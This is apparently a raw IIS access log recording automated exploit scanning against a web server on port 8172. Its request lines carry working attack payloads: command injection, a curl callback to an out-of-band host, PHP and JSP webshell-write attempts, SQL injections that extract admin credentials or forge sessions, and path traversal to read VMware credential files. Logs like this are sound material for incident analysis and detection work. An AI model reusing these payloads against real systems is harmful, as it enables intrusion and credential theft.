- 404 7 0 84 2024-12-12 14:34:16 103.153.214.94 GET /view/systemConfig/management/T9aAO2.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.6+Safari/605.1.15 - 404 7 0 66 2024-12-12 14:34:20 103.153.214.94 GET /view/systemConfig/management/nmc_sync.php center_ip=127.0.0.1&template_path=|rm+T9aAO2.txt|cat 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 74 2024-12-12 14:34:34 103.153.214.94 POST /seeyon/wpsAssistServlet flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/Egkkjq.jsp&fileId=2 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 66 2024-12-12 14:34:38 103.153.214.94 GET /Egkkjq.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.4.21 - 404 7 0 62 2024-12-12 14:34:47 103.153.214.94 POST / g=obj_app_upfile 8172 - 206.238.196.225 Mozilla/5.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;+Trident/4.0) - 404 7 0 47 2024-12-12 14:34:50 103.153.214.94 GET /attachements/SUomI5.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.61+Safari/537.36 - 404 7 0 44 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-12 14:36:07 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-12 14:36:07 103.153.214.94 GET /query getcommand&cmd=curl+http://ctcj3jjbclslbev4n7q0co5oykpnd1q61.oast.live 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML++like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 1944 2024-12-12 14:36:07 103.153.214.94 POST /cgi-bin/cstecgi.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 477 2024-12-12 14:36:13 103.153.214.94 GET /2q6JQc3QjGS36LtMALkiIjQL5Yl - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 293 2024-12-12 14:36:52 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 33 2024-12-12 14:37:46 103.153.214.94 POST /main/webservices/additional_webservices.php - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 229 2024-12-12 14:37:49 103.153.214.94 GET /index.php a=fetch&content=%3C%3Fphp+file_put_contents%28%222q3kZAXfmSgpbKg9pMoULWjd6wf.php%22%2C%22%3C%3Fphp+echo+md5%28%22thinkcmf-rce%22%29%3Bunlink%28__FILE__%29%3B%22%29%3B 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 14:37:52 103.153.214.94 GET /2q3kZAXfmSgpbKg9pMoULWjd6wf.php - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 34 2024-12-12 14:37:59 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 222 2024-12-12 14:38:02 103.153.214.94 GET /modules/leocustomajax/leoajax.php cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1.2+Safari/605.1.15 - 404 7 0 197 2024-12-12 14:39:13 103.153.214.94 GET /general/index.php - 8172 - 206.238.196.225 - - 404 7 0 34 2024-12-12 14:39:15 103.153.214.94 POST /ispirit/interface/gateway.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/102.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 14:39:15 103.153.214.94 POST /general/file_folder/swfupload_new.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.54 - 404 7 0 62 2024-12-12 14:39:52 103.153.214.94 POST /general/bi_design/appcenter/report_bi.func.php - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 47 2024-12-12 14:40:28 103.153.214.94 POST /Servlet/Skins - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 198 2024-12-12 14:40:29 103.153.214.94 POST /admin/login.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 241 2024-12-12 14:40:32 103.153.214.94 GET /admin/dashboard.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 198 2024-12-12 14:40:33 103.153.214.94 GET /2q6JQbYLOVyN6t8Y3fESFrkVMfv.jsp - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.1.41 - 404 7 0 224 2024-12-12 14:40:36 103.153.214.94 POST /ueditor/php/controller.php action=uploadfile 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/616.19.3+(KHTML,+like+Gecko)+Version/17.6.11+Safari/616.19.3 - 404 7 0 63 2024-12-12 14:41:31 103.153.214.94 POST /ajax.php do=inforum&listforumid=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&result=10 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 41 2024-12-12 14:41:56 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/100.0.4896.127+Safari/537.36 - 404 7 0 204 2024-12-12 14:42:51 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 41 2024-12-12 14:42:56 103.153.214.94 GET /sjeoizztokh.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+15_7_9)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.4+Safari/605.1.15 - 404 7 0 37 2024-12-12 14:42:59 103.153.214.94 POST /goform/aspForm - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 203 2024-12-12 14:43:02 103.153.214.94 GET /wrewusw - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 197 2024-12-12 14:43:04 103.153.214.94 POST /ajax.php action=save_user 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 239 2024-12-12 14:43:04 103.153.214.94 POST /api/v1/snapshots - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/616.13.10+(KHTML,+like+Gecko)+Version/17.2.97+Safari/616.13.10 - 404 7 0 221 2024-12-12 14:43:07 103.153.214.94 GET /login.php - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 216 2024-12-12 14:43:57 103.153.214.94 POST /hybridity/api/sessions - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 62 2024-12-12 14:44:00 103.153.214.94 GET /general/login_code.php - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 33 2024-12-12 14:44:17 103.153.214.94 POST /search.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.8.22 - 404 7 0 37 2024-12-12 14:44:19 103.153.214.94 POST /module/ueditor/php/action_upload.php action=uploadfile 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.12;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 36 2024-12-12 14:44:21 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:84.0)+Gecko/20100101+Firefox/84.0 - 404 7 0 31 2024-12-12 14:44:21 103.153.214.94 POST /ispirit/interface/gateway.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.21 - 404 7 0 57 2024-12-12 14:44:24 103.153.214.94 GET /2q3kZAX6MHl1zVtuU7vIk1QYmRS.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 33 2024-12-12 14:44:24 103.153.214.94 POST /mac/gateway.php - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 37 2024-12-12 14:44:40 103.153.214.94 POST /jeecg-boot/jmreport/show - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:89.0)+Gecko/20100101+Firefox/89.0 - 404 7 0 205 2024-12-12 14:45:20 103.153.214.94 GET /portal/info.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 64 2024-12-12 14:45:36 103.153.214.94 POST /general/document/index.php/recv/register/insert - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 89 2024-12-12 14:45:40 103.153.214.94 POST /general/document/index.php/recv/register/insert - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 35 2024-12-12 14:47:16 103.153.214.94 GET /view/IPV6/naborTable/static_convert.php blocks[0]=||%20echo%20%272q3kZ75L5f65LOUYilITGtSPPQI%27%20%3E%20/var/www/html/config_application.txt%0a 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 60 2024-12-12 14:47:20 103.153.214.94 GET /config_application.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 36 2024-12-12 14:47:55 103.153.214.94 POST /login_check.php - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 34 2024-12-12 14:48:00 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 36 2024-12-12 14:48:09 103.153.214.94 POST /login - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.2+Safari/605.1.15 https://bcvt.kontum.gov.vn:8172/login.jsp 404 7 0 31 2024-12-12 14:48:38 103.153.214.94 POST /api/runscript - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 216 2024-12-12 14:48:41 103.153.214.94 GET /_images/wCUd28 - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 218 2024-12-12 14:50:29 103.153.214.94 GET /wp-content/plugins/ultimate-member/readme.txt - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/116.0 - 404 7 0 222 2024-12-12 14:51:37 103.153.214.94 GET /websso/SAML2/SSO/vsphere.local SAMLRequest 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 14:51:37 103.153.214.94 POST /ui/login.action - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/ui/login.action 404 7 0 60 2024-12-12 14:51:39 103.153.214.94 PUT /api/2.0/services/usermgmt/password/icxwmj - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 35 2024-12-12 14:51:39 103.153.214.94 PUT /api/2.0/services/usermgmt/password/icxwmj - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.88+Safari/537.36 - 404 7 0 39 2024-12-12 14:51:48 103.153.214.94 POST /mobile/api/api.ali.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 33 2024-12-12 14:51:51 103.153.214.94 GET /inc/package/work.php id=../../../../../myoa/attach/approve_center/2412/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.fb6790f4 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.9.25 - 404 7 0 33 2024-12-12 14:51:51 103.153.214.94 POST /suite-api/api/auth/token/acquire - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1+20.51 https://bcvt.kontum.gov.vn:8172/ui/ 404 7 0 78 2024-12-12 14:51:55 103.153.214.94 GET /eam/vib id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/106.0.0.0+Safari/537.36 - 404 7 0 40 2024-12-12 14:51:55 103.153.214.94 GET /2q3kZ8OQv5GIq3EoNLOtqcTKeo3.php - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 54 2024-12-12 14:51:55 103.153.214.94 GET /eam/vib id=C:\ProgramData\VMware\VMware+VirtualCenter\vcdb.properties 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 14:51:55 103.153.214.94 GET /eam/vib id=C:\Documents+and+Settings\All+Users\Application+Data\VMware\VMware+VirtualCenter\vcdb.properties 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/94.0.4606.81+Safari/537.36 - 404 7 0 41 2024-12-12 14:52:14 103.153.214.94 GET /defaultroot/public/iSignatureHTML.jsp/DocumentEdit.jsp DocumentID=1';WAITFOR%20DELAY%20'0:0:7'-- 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/119.0 - 404 7 0 57 2024-12-12 14:54:28 103.153.214.94 POST /main/webservices/additional_webservices.php - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 216 2024-12-12 14:54:56 103.153.214.94 POST /defaultroot/TeleConferenceService - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 40 2024-12-12 14:55:29 103.153.214.94 POST /mobile/plugin/VerifyQuickLogin.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 53 2024-12-12 14:56:08 103.153.214.94 GET /ws/msw/tenant/'+union+select+(select+ID+from+SGMSDB.DOMAINS+limit+1),+'',+'',+'',+'',+'',+(select+concat(id,+':',+password)+from+sgmsdb.users+where+active+=+'1'+order+by+issuperadmin+desc+limit+1+offset+0),'',+'',+' - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 400 0 0 345 2024-12-12 14:56:10 103.153.214.94 GET /appliance/login - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 14:56:27 103.153.214.94 POST /sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.16;+rv:85.0)+Gecko/20100101+Firefox/85.0 - 404 7 0 234 2024-12-12 14:57:10 103.153.214.94 POST /rest/ofs/deleteUserRequestInfoByXml - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 70 2024-12-12 14:57:49 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 203 2024-12-12 14:57:49 103.153.214.94 POST / PHPRC=/dev/fd/0 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.9.25 - 404 7 0 202 2024-12-12 14:57:55 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 231 2024-12-12 14:58:18 103.153.214.94 POST /cpt/manage/validate.jsp sourcestring=validateNum 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 80 2024-12-12 14:58:45 103.153.214.94 POST /defaultroot/upload/fileUpload.controller - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 34 2024-12-12 14:59:54 103.153.214.94 GET /app service=page/SetupCompleted 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686;+rv:24.0)+Gecko/20100101+Firefox/24.0 - 404 7 0 211 2024-12-12 14:59:59 103.153.214.94 POST /app - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.15 - 404 7 0 198 2024-12-12 15:00:03 103.153.214.94 POST /app - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 227 2024-12-12 15:00:06 103.153.214.94 POST /app - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/96.0.4664.45+Safari/537.36 - 404 7 0 200 2024-12-12 15:00:07 103.153.214.94 POST /loadfile.lp pageid=Configure 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2623.87+Safari/537.36 - 404 7 0 222 2024-12-12 15:00:10 103.153.214.94 POST /app - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/115.0.0.0+Safari/537.36 - 404 7 0 217 2024-12-12 15:00:14 103.153.214.94 POST /app - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.2;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 206 2024-12-12 15:00:17 103.153.214.94 GET /app service=page/PrinterList 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 216 2024-12-12 15:00:28 103.153.214.94 POST /client.do - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:91.0)+Gecko/20100101+Firefox/91.0 - 404 7 0 39 2024-12-12 15:01:46 103.153.214.94 POST /pig/add-pig.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/95.0.4638.69+Safari/537.36 - 404 7 0 201 2024-12-12 15:02:28 103.153.214.94 POST /E-mobile/App/Ajax/ajax.php action=mobile_upload_save 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:77.0)+Gecko/20100101+Firefox/77.0 - 404 7 0 47 2024-12-12 15:02:35 103.153.214.94 POST /CFIDE/adminapi/base.cfc method 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 223 2024-12-12 15:02:49 103.153.214.94 POST /page/exportImport/uploadOperation.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:50.0)+Gecko/20100101+Firefox/50.0 - 404 7 0 44 2024-12-12 15:02:53 103.153.214.94 GET /page/exportImport/fileTransfer/2q3kZ9kiqkIPxZUEI1QAPklIW1X.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12_2_8;+en)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.2+Safari/605.1.15 - 404 7 0 61 2024-12-12 15:03:24 103.153.214.94 POST /human.aspx Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%272q6JQSoKj2LRz5PlKc4TyHZCVLU%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%272q6JQSoKj2LRz5PlKc4TyHZCVLU%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%272q6JQSoKj2LRz5PlKc4TyHZCVLU%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%272q6JQSoKj2LRz5PlKc4TyHZCVLU%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%272q6JQSoKj2LRz5PlKc4TyHZCVLU%27;UPDATE+activesessions+SET+IpAddress=%27156.251.25.152%27+WHERE+SessionID=%272q6JQSoKj2LRz5PlKc4TyHZCVLU%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%272q6JQSoKj2LRz5PlKc4TyHZCVLU%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%272q6JQSoKj2LRz5PlKc4TyHZCVLU%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%272q6JQSoKj2LRz5PlKc4TyHZCVLU%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%272q6JQSoKj2LRz5PlKc4TyHZCVLU%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%272q6JQSoKj2LRz5PlKc4TyHZCVLU%27%23 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/618.31.14+(KHTML,+like+Gecko)+Version/17.7+Safari/618.31.14 - 404 7 0 229 2024-12-12 15:04:12 103.153.214.94 POST /page/exportImport/uploadOperation.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 107 2024-12-12 15:04:15 103.153.214.94 GET /page/exportImport/fileTransfer/poc.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 - 404 7 0 43 2024-12-12 15:04:20 103.153.214.94 GET /cgi-bin/gateway/agentinfo - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.5.20 - 404 7 0 96 2024-12-12 15:04:42 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 58 2024-12-12 15:06:08 103.153.214.94 GET /b_download/index.html - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 209 2024-12-12 15:06:08 103.153.214.94 GET /b_download/index.html - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Mobile/15E148+Safari/604.1 - 404 7 0 218 2024-12-12 15:07:32 103.153.214.94 POST /weaver/bsh.servlet.BshServlet - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 67 2024-12-12 15:07:36 103.153.214.94 POST /weaver/bsh.servlet.BshServlet - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.23 - 404 7 0 93 2024-12-12 15:08:09 103.153.214.94 GET /wp-login.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/95.0.4638.54+Safari/537.36 - 404 7 0 201 2024-12-12 15:08:11 103.153.214.94 GET /wp-json/wp/v2/users/ - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 197 2024-12-12 15:08:15 103.153.214.94 GET / rest_route=/wp/v2/users 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 